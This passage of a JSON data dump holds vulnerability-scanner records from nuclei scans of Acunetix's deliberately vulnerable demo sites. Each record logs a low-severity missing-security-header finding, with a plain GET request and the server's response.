chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 551, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/admin'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/admin", + "discovered_date": "2024-11-13T02:41:22.845Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /admin HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 308 PERMANENT REDIRECT\r\nConnection: close\r\nContent-Length: 253\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nLocation: http://localhost/admin/\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>Redirecting...</title>\n<h1>Redirecting...</h1>\n<p>You should be redirected automatically to target URL: <a href="http://localhost/admin/">http://localhost/admin/</a>. If not click the link.", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 552, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50' 'http://testhtml5.vulnweb.com/.carousel'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/.carousel", + "discovered_date": "2024-11-13T02:41:22.994Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.carousel HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 NOT FOUND\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>404 Not Found</title>\n<h1>Not Found</h1>\n<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 553, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48' 'http://testhtml5.vulnweb.com/ajax/archive'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/ajax/archive", + "discovered_date": "2024-11-13T02:41:23.155Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /ajax/archive HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 2\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n[]", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 554, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203' 'http://testphp.vulnweb.com/CVS/Repository'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Repository", + "discovered_date": "2024-11-13T02:41:23.299Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Repository HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 8\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:56 GMT\r\nEtag: "4dca64a4-8"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\nacupart\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 555, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36' 'http://testhtml5.vulnweb.com/comment'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/comment", + "discovered_date": "2024-11-13T02:41:23.447Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /comment HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Sorry, but commenting is currently disabled! <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 556, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53' 'http://testhtml5.vulnweb.com/contact'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/contact", + "discovered_date": "2024-11-13T02:41:23.602Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /contact HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 557, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at", + "discovered_date": "2024-11-13T02:41:23.754Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/libs/sessvars.js:105at HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 558, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1' 'http://testhtml5.vulnweb.com/forgotpw'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/forgotpw", + "discovered_date": "2024-11-13T02:41:23.900Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /forgotpw HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 559, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32' 'http://testhtml5.vulnweb.com/static/app/partials'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/partials", + "discovered_date": "2024-11-13T02:41:24.054Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/partials HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:50 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 560, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36' 'http://testhtml5.vulnweb.com/samples'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/samples", + "discovered_date": "2024-11-13T02:41:24.203Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /samples HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n "http://www.w3.org/TR/html4/loose.dtd">\n<html>\n<head>\n <title>Python samples</title>\n</head>\n<body>\n <h3>Simple python programs:</h3>\n <ul>\n <li><a href="/getfile?fname=sample1.py">First sample</a></li>\n <li><a href="/getfile?fname=sample1.py">Second sample</a></li>\n </ul>\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 561, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49' 'http://testphp.vulnweb.com/CVS/Entries.Log'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Entries.Log", + "discovered_date": "2024-11-13T02:41:24.347Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Entries.Log HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 562, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102' 'http://testasp.vulnweb.com'", + "type": "http", + "http_url": "http://testasp.vulnweb.com", + "discovered_date": "2024-11-13T02:41:24.500Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3541\r\nCache-Control: private\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASPSESSIONIDSASBSTRC=LIKALMIBLAODJLDJGONMEJAO; path=/\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">\r\n<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->\r\n<head>\r\n<!-- InstanceBeginEditable name="doctitle" -->\r\n<title>acuforum forums</title>\r\n<!-- InstanceEndEditable -->\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">\r\n<!-- InstanceBeginEditable name="head" -->\r\n<!-- InstanceEndEditable -->\r\n<link href="styles.css" rel="stylesheet" type="text/css">\r\n</head>\r\n<body> \r\n<table width="100%" border="0" cellpadding="10" cellspacing="0"> \r\n <tr bgcolor="#008F00"> \r\n <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> \r\n <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a 